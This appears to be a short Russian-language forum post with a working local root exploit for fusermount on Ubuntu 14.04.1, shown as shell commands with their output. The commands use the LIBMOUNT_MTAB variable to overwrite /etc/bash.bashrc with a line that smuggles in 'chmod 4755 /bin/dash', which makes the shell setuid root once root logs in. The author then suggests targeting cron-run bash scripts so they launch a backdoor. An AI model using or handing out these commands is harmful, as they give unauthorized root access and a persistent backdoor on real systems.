Ubuntu 14.04.1 LTS
Код:
$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
fusermount: failed to open /etc/fuse.conf: Permission denied
fusermount: mountpoint is not empty
fusermount: if you are sure this is safe, use the 'nonempty' mount option
$ ls -lia /etc/bash.bashrc
130531 -rw-r--r-- 1 root root 1,7k Mar 23 2014 /etc/bash.bashrc
$ echo $0;ls -lia /etc/$0.$0rc
/bin/sh
ls: cannot access /etc//bin/sh./bin/shrc: No such file or directory
->
Код:
$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 755 /tmp/exploit
$ mkdir -p '/tmp/exploit||/tmp/exploit'
$ LIBMOUNT_MTAB=/etc/bash.bashrc _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0
$ ls -lia /etc/bash.bashrc
130531 -rw-r--r-- 1 root root 78 May 22 15:43 /etc/bash.bashrc
добавлю, что ждать захода рута и ждать пока он увидит ошибки вообще не айс, делаем ps aux / ищем всякие bash скрипты в кроне и вместо /etc/bash.bashrc пишем туда запуск нашего бекдора = profit